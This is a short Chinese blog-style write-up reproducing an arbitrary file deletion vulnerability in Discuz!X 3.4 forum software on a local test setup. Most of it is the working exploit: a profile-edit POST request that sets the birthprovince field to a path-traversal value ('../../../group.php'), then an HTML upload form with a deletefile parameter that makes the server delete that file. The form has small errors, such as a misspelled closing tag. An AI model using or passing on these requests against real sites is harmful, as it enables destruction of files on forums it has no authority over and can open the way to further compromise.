今天看到一个Discuz!X 前台任意文件删除漏洞。
自己本机搭建环境进行测试
环境搭建我用的是Discuz 3.4版本的。phpstudy
环境搭建完毕后,注册一个账号。
到达个人信息修改页面。
拦截数据包,修改birthprovince参数为文件站点存在的文件。。比如我要测试删除这个group.php文件。
发送包以后我们还要构造请求去执行删除的文件。
请求 home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../group.php&profilesubmit=1&formhash=3123Cv
其中 formhash 为用户 hash
然后写一个执行改服务器的html表单。如下
<form
action="http://你的服务器IP/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovi
nce]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="f6a1381a"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>
保存为test.html
提交表单,upload目录下的group.php文件就被删除了。